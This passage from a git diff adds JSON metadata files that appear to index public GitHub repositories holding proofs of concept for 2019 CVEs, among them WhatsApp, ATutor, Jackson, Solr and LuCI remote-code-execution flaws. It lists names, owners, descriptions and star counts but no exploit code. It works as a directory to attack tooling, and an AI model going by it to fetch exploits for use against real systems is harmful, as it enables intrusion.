"html_url": "https:\/\/github.com\/starling021\/CVE-2019-11932-SupportApp", + "description": null, + "fork": false, + "created_at": "2020-08-20T02:45:40Z", + "updated_at": "2020-08-20T02:45:54Z", + "pushed_at": "2020-08-20T02:45:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 294892081, + "name": "CVE-2019-11932", + "full_name": "primebeast\/CVE-2019-11932", + "owner": { + "login": "primebeast", + "id": 64252861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64252861?v=4", + "html_url": "https:\/\/github.com\/primebeast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/primebeast\/CVE-2019-11932", + "description": null, + "fork": false, + "created_at": "2020-09-12T07:18:57Z", + "updated_at": "2020-09-12T07:19:57Z", + "pushed_at": "2020-09-12T07:19:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 323076010, + "name": "hello", + "full_name": "BadAssAiras\/hello", + "owner": { + "login": "BadAssAiras", + "id": 76394667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76394667?v=4", + "html_url": "https:\/\/github.com\/BadAssAiras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BadAssAiras\/hello", + "description": "https:\/\/github.com\/awakened1712\/CVE-2019-11932:\/\/github.com\/awakened1712\/CVE-2019-11932", + "fork": false, + "created_at": "2020-12-20T13:17:19Z", + "updated_at": "2020-12-20T13:17:19Z", + "pushed_at": "2020-12-20T13:17:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 349491080, + "name": "WhatsAppHACK-RCE", + "full_name": "kal1gh0st\/WhatsAppHACK-RCE", + "owner": { + "login": "kal1gh0st", + "id": 56889513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4", + "html_url": "https:\/\/github.com\/kal1gh0st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kal1gh0st\/WhatsAppHACK-RCE", + "description": "Whatsapp remote code execution CVE-2019-11932 https:\/\/awakened1712.github.io\/hacking\/hacking-whatsapp-gif-rce\/", + "fork": false, + "created_at": "2021-03-19T16:41:31Z", + "updated_at": "2024-11-24T14:51:20Z", + "pushed_at": "2021-11-17T14:40:14Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 382906478, + "name": "CVE-2019-11932", + "full_name": "zxn1\/CVE-2019-11932", + "owner": { + "login": "zxn1", + "id": 32796539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32796539?v=4", + "html_url": "https:\/\/github.com\/zxn1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zxn1\/CVE-2019-11932", + "description": null, + "fork": false, + "created_at": "2021-07-04T17:07:19Z", + "updated_at": "2022-08-01T09:48:29Z", + "pushed_at": "2021-07-04T17:08:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 388931033, + "name": "WhatsApp-Double-Free-Vulnerability_CVE-2019-11932", + "full_name": "k3vinlusec\/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932", + "owner": { + "login": "k3vinlusec", + "id": 19988136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19988136?v=4", + "html_url": "https:\/\/github.com\/k3vinlusec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3vinlusec\/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932", + "description": "Exploit Analysis of The WhatsApp Double-Free Vulnerability (CVE-2019-11932) Using the GEF-GDB Debugger", + "fork": false, + "created_at": "2021-07-23T21:29:56Z", + "updated_at": "2023-05-23T04:53:50Z", + "pushed_at": "2021-07-23T23:07:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 397173185, + "name": "https-github.com-awakened1712-CVE-2019-11932", + "full_name": "Tabni\/https-github.com-awakened1712-CVE-2019-11932", + "owner": { + "login": "Tabni", + "id": 89070276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89070276?v=4", + "html_url": "https:\/\/github.com\/Tabni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tabni\/https-github.com-awakened1712-CVE-2019-11932", + "description": "CVE-2019-11932", + "fork": false, + "created_at": "2021-08-17T08:35:11Z", + "updated_at": "2021-10-24T12:41:35Z", + "pushed_at": "2021-08-17T08:35:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 620782596, + "name": "cd-CVE-2019-11932", + "full_name": "0759104103\/cd-CVE-2019-11932", + "owner": { + "login": "0759104103", + "id": 129280794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129280794?v=4", + "html_url": "https:\/\/github.com\/0759104103", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0759104103\/cd-CVE-2019-11932", + "description": null, + "fork": false, + "created_at": "2023-03-29T11:12:36Z", + "updated_at": "2023-03-29T11:12:36Z", + "pushed_at": "2023-03-29T11:12:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696155530, + "name": "CVE-2019-11932", + "full_name": "tucommenceapousser\/CVE-2019-11932", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2019-11932", + "description": "Double-Free BUG in WhatsApp exploit poc.", + "fork": false, + "created_at": "2023-09-25T07:45:49Z", + "updated_at": "2023-09-25T07:47:32Z", + "pushed_at": "2023-09-25T07:56:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696211441, + "name": "CVE-2019-11932deta", + "full_name": "tucommenceapousser\/CVE-2019-11932deta", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2019-11932deta", + "description": "Double-Free BUG in WhatsApp exploit poc.", + "fork": false, + "created_at": "2023-09-25T10:08:15Z", + "updated_at": "2023-09-25T10:09:20Z", + "pushed_at": "2023-09-25T10:15:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11933.json b/2019/CVE-2019-11933.json new file mode 100644 index 0000000000..a1e21d4b24 --- /dev/null +++ b/2019/CVE-2019-11933.json @@ -0,0 +1,64 @@ +[ + { + "id": 219658737, + "name": "CVE-2019-11933", + "full_name": "NatleoJ\/CVE-2019-11933", + "owner": { + "login": "NatleoJ", + "id": 57383561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57383561?v=4", + "html_url": "https:\/\/github.com\/NatleoJ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NatleoJ\/CVE-2019-11933", + "description": "Heap corruption in WhatsApp's media picker", + "fork": false, + "created_at": "2019-11-05T04:38:26Z", + "updated_at": "2020-05-20T04:12:33Z", + "pushed_at": "2020-05-20T04:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 388477169, + "name": "CVE-2019-11933", + "full_name": "KISH84172\/CVE-2019-11933", + "owner": { + "login": "KISH84172", + "id": 41411700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41411700?v=4", + "html_url": "https:\/\/github.com\/KISH84172", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KISH84172\/CVE-2019-11933", + "description": null, + "fork": false, + "created_at": "2021-07-22T13:45:00Z", + "updated_at": "2021-07-22T13:45:03Z", + "pushed_at": "2021-07-22T13:45:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12086.json b/2019/CVE-2019-12086.json new file mode 100644 index 0000000000..a2809c86c1 --- /dev/null +++ b/2019/CVE-2019-12086.json @@ -0,0 +1,64 @@ +[ + { + "id": 188788797, + "name": "CVE-2019-12086-jackson-databind-file-read", + "full_name": "motoyasu-saburi\/CVE-2019-12086-jackson-databind-file-read", + "owner": { + "login": "motoyasu-saburi", + "id": 18521568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18521568?v=4", + "html_url": "https:\/\/github.com\/motoyasu-saburi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motoyasu-saburi\/CVE-2019-12086-jackson-databind-file-read", + "description": null, + "fork": false, + "created_at": "2019-05-27T07:00:17Z", + "updated_at": "2019-12-26T14:37:38Z", + "pushed_at": "2019-05-27T08:32:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 266165766, + "name": "CVE-2019-12086", + "full_name": "Al1ex\/CVE-2019-12086", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2019-12086", + "description": "jackson unserialize", + "fork": false, + "created_at": "2020-05-22T17:10:10Z", + "updated_at": "2024-08-12T20:01:46Z", + "pushed_at": "2022-11-16T08:58:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1215.json b/2019/CVE-2019-1215.json new file mode 100644 index 0000000000..86fbf82784 --- /dev/null +++ b/2019/CVE-2019-1215.json @@ -0,0 +1,33 @@ +[ + { + "id": 232197518, + "name": "CVE-2019-1215", + "full_name": "bluefrostsecurity\/CVE-2019-1215", + "owner": { + "login": "bluefrostsecurity", + "id": 4976074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4976074?v=4", + "html_url": "https:\/\/github.com\/bluefrostsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bluefrostsecurity\/CVE-2019-1215", + "description": null, + "fork": false, + "created_at": "2020-01-06T22:34:16Z", + "updated_at": "2024-08-12T19:56:22Z", + "pushed_at": "2020-01-07T14:29:45Z", + "stargazers_count": 147, + "watchers_count": 147, + "has_discussions": false, + "forks_count": 47, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 47, + "watchers": 147, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12169.json b/2019/CVE-2019-12169.json new file mode 100644 index 0000000000..95c8b40e94 --- /dev/null +++ b/2019/CVE-2019-12169.json @@ -0,0 +1,36 @@ +[ + { + "id": 188356491, + "name": "ATutor-2.2.4-Language-Exploit", + "full_name": "fuzzlove\/ATutor-2.2.4-Language-Exploit", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/ATutor-2.2.4-Language-Exploit", + "description": "ATutor 2.2.4 Arbitrary File Upload \/ RCE (CVE-2019-12169)", + "fork": false, + "created_at": "2019-05-24T05:15:17Z", + "updated_at": "2024-08-12T19:49:15Z", + "pushed_at": "2019-06-09T21:39:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "penetration-testing" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12170.json b/2019/CVE-2019-12170.json new file mode 100644 index 0000000000..0c58fa5e8d --- /dev/null +++ b/2019/CVE-2019-12170.json @@ -0,0 +1,36 @@ +[ + { + "id": 186354983, + "name": "ATutor-Instructor-Backup-Arbitrary-File", + "full_name": "fuzzlove\/ATutor-Instructor-Backup-Arbitrary-File", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/ATutor-Instructor-Backup-Arbitrary-File", + "description": "ATutor 2.2.4 'Backup' Remote Command Execution (CVE-2019-12170)", + "fork": false, + "created_at": "2019-05-13T06:01:47Z", + "updated_at": "2024-08-12T19:48:50Z", + "pushed_at": "2019-06-03T04:12:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "penetration-testing" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1218.json b/2019/CVE-2019-1218.json new file mode 100644 index 0000000000..2f150ef9e7 --- /dev/null +++ b/2019/CVE-2019-1218.json @@ -0,0 +1,33 @@ +[ + { + "id": 213964925, + "name": "CVE-2019-1218", + "full_name": "d0gukank\/CVE-2019-1218", + "owner": { + "login": "d0gukank", + "id": 28220843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28220843?v=4", + "html_url": "https:\/\/github.com\/d0gukank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0gukank\/CVE-2019-1218", + "description": "Outlook iOS Spoofing Vulnerability", + "fork": false, + "created_at": "2019-10-09T16:12:09Z", + "updated_at": "2024-08-12T19:53:45Z", + "pushed_at": "2020-03-14T21:07:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12180.json b/2019/CVE-2019-12180.json new file mode 100644 index 0000000000..2c3ec2375d --- /dev/null +++ b/2019/CVE-2019-12180.json @@ -0,0 +1,33 @@ +[ + { + "id": 235158626, + "name": "CVE-2019-12180", + "full_name": "0x-nope\/CVE-2019-12180", + "owner": { + "login": "0x-nope", + "id": 15691160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15691160?v=4", + "html_url": "https:\/\/github.com\/0x-nope", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x-nope\/CVE-2019-12180", + "description": "Advisory & PoC", + "fork": false, + "created_at": "2020-01-20T17:33:23Z", + "updated_at": "2024-08-12T19:56:51Z", + "pushed_at": "2020-02-07T08:25:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12181.json b/2019/CVE-2019-12181.json new file mode 100644 index 0000000000..fb6582bc30 --- /dev/null +++ b/2019/CVE-2019-12181.json @@ -0,0 +1,39 @@ +[ + { + "id": 191652233, + "name": "CVE-2019-12181", + "full_name": "mavlevin\/CVE-2019-12181", + "owner": { + "login": "mavlevin", + "id": 33753158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33753158?v=4", + "html_url": "https:\/\/github.com\/mavlevin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mavlevin\/CVE-2019-12181", + "description": "LPE Exploit For CVE-2019-12181 (Serv-U FTP 15.1.6)", + "fork": false, + "created_at": "2019-06-12T22:18:45Z", + "updated_at": "2024-08-12T19:50:00Z", + "pushed_at": "2019-10-20T21:36:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "codeinjection", + "cve", + "exploit", + "lpe", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12185.json b/2019/CVE-2019-12185.json new file mode 100644 index 0000000000..7703dfc4e9 --- /dev/null +++ b/2019/CVE-2019-12185.json @@ -0,0 +1,33 @@ +[ + { + "id": 187415847, + "name": "eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE", + "full_name": "fuzzlove\/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE", + "description": "eLabFTW 1.8.5 'EntityController' Arbitrary File Upload \/ RCE (CVE-2019-12185)", + "fork": false, + "created_at": "2019-05-18T23:56:52Z", + "updated_at": "2024-08-12T19:49:02Z", + "pushed_at": "2019-05-20T00:29:16Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12189.json b/2019/CVE-2019-12189.json new file mode 100644 index 0000000000..aa4ac91506 --- /dev/null +++ b/2019/CVE-2019-12189.json @@ -0,0 +1,33 @@ +[ + { + "id": 187569819, + "name": "CVE-2019-12189", + "full_name": "falconz\/CVE-2019-12189", + "owner": { + "login": "falconz", + "id": 9218490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9218490?v=4", + "html_url": "https:\/\/github.com\/falconz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/falconz\/CVE-2019-12189", + "description": null, + "fork": false, + "created_at": "2019-05-20T04:52:38Z", + "updated_at": "2024-08-12T19:49:05Z", + "pushed_at": "2019-05-20T06:03:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1221.json b/2019/CVE-2019-1221.json new file mode 100644 index 0000000000..b475ab547a --- /dev/null +++ b/2019/CVE-2019-1221.json @@ -0,0 +1,33 @@ +[ + { + "id": 322718240, + "name": "CVE-2019-1221", + "full_name": "ZwCreatePhoton\/CVE-2019-1221", + "owner": { + "login": "ZwCreatePhoton", + "id": 73783540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73783540?v=4", + "html_url": "https:\/\/github.com\/ZwCreatePhoton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZwCreatePhoton\/CVE-2019-1221", + "description": null, + "fork": false, + "created_at": "2020-12-18T22:28:11Z", + "updated_at": "2021-08-30T01:11:21Z", + "pushed_at": "2020-12-18T22:43:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12255.json b/2019/CVE-2019-12255.json new file mode 100644 index 0000000000..36e1eb9c40 --- /dev/null +++ b/2019/CVE-2019-12255.json @@ -0,0 +1,33 @@ +[ + { + "id": 221308311, + "name": "Urgent11-Suricata-LUA-scripts", + "full_name": "sud0woodo\/Urgent11-Suricata-LUA-scripts", + "owner": { + "login": "sud0woodo", + "id": 40278342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40278342?v=4", + "html_url": "https:\/\/github.com\/sud0woodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sud0woodo\/Urgent11-Suricata-LUA-scripts", + "description": "Suricata LUA scripts to detect CVE-2019-12255, CVE-2019-12256, CVE-2019-12258, and CVE-2019-12260", + "fork": false, + "created_at": "2019-11-12T20:43:46Z", + "updated_at": "2024-08-12T19:54:47Z", + "pushed_at": "2019-11-28T20:16:35Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12272.json b/2019/CVE-2019-12272.json new file mode 100644 index 0000000000..8c9f378129 --- /dev/null +++ b/2019/CVE-2019-12272.json @@ -0,0 +1,64 @@ +[ + { + "id": 195171033, + "name": "LuCI_RCE_exp", + "full_name": "HACHp1\/LuCI_RCE_exp", + "owner": { + "login": "HACHp1", + "id": 25722416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25722416?v=4", + "html_url": "https:\/\/github.com\/HACHp1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HACHp1\/LuCI_RCE_exp", + "description": "Exp of cve-2019-12272", + "fork": false, + "created_at": "2019-07-04T04:54:36Z", + "updated_at": "2024-09-12T10:08:40Z", + "pushed_at": "2019-07-10T04:33:30Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 226418974, + "name": "lede-17.01.3", + "full_name": "nevercodecorrect\/lede-17.01.3", + "owner": { + "login": "nevercodecorrect", + "id": 15247135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15247135?v=4", + "html_url": "https:\/\/github.com\/nevercodecorrect", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nevercodecorrect\/lede-17.01.3", + "description": "Version-contains-cve-2019-12272", + "fork": false, + "created_at": "2019-12-06T22:04:24Z", + "updated_at": "2024-08-12T19:55:31Z", + "pushed_at": "2019-12-06T22:18:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12314.json b/2019/CVE-2019-12314.json new file mode 100644 index 0000000000..1f94e52ee9 --- /dev/null +++ b/2019/CVE-2019-12314.json @@ -0,0 +1,33 @@ +[ + { + "id": 219755425, + "name": "CVE-2019-12314", + "full_name": "ras313\/CVE-2019-12314", + "owner": { + "login": "ras313", + "id": 57402076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57402076?v=4", + "html_url": "https:\/\/github.com\/ras313", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ras313\/CVE-2019-12314", + "description": "Optional Mitigation Steps", + "fork": false, + "created_at": "2019-11-05T13:45:58Z", + "updated_at": "2019-11-05T13:53:04Z", + "pushed_at": "2019-11-05T13:51:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12384.json b/2019/CVE-2019-12384.json new file mode 100644 index 0000000000..182538d5b1 --- /dev/null +++ b/2019/CVE-2019-12384.json @@ -0,0 +1,64 @@ +[ + { + "id": 198579428, + "name": "CVE-2019-12384", + "full_name": "jas502n\/CVE-2019-12384", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-12384", + "description": "Jackson Rce For CVE-2019-12384 ", + "fork": false, + "created_at": "2019-07-24T07:12:14Z", + "updated_at": "2024-08-12T19:51:20Z", + "pushed_at": "2019-07-24T07:31:42Z", + "stargazers_count": 97, + "watchers_count": 97, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 97, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 198939305, + "name": "Jackson_RCE-CVE-2019-12384", + "full_name": "MagicZer0\/Jackson_RCE-CVE-2019-12384", + "owner": { + "login": "MagicZer0", + "id": 19569793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19569793?v=4", + "html_url": "https:\/\/github.com\/MagicZer0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagicZer0\/Jackson_RCE-CVE-2019-12384", + "description": "CVE-2019-12384 漏洞测试环境", + "fork": false, + "created_at": "2019-07-26T03:24:38Z", + "updated_at": "2024-08-12T19:51:24Z", + "pushed_at": "2022-11-16T11:52:18Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12409.json b/2019/CVE-2019-12409.json new file mode 100644 index 0000000000..cf8bbc8525 --- /dev/null +++ b/2019/CVE-2019-12409.json @@ -0,0 +1,33 @@ +[ + { + "id": 222651199, + "name": "CVE-2019-12409", + "full_name": "jas502n\/CVE-2019-12409", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-12409", + "description": "Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=\"true\")", + "fork": false, + "created_at": "2019-11-19T08:53:56Z", + "updated_at": "2024-08-12T19:55:00Z", + "pushed_at": "2019-11-19T09:18:00Z", + "stargazers_count": 102, + "watchers_count": 102, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 102, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12422.json b/2019/CVE-2019-12422.json new file mode 100644 index 0000000000..9113be7b35 --- /dev/null +++ b/2019/CVE-2019-12422.json @@ -0,0 +1,33 @@ +[ + { + "id": 885354155, + "name": "RuoYI-4.2-Shiro-721-Docker-PoC", + "full_name": 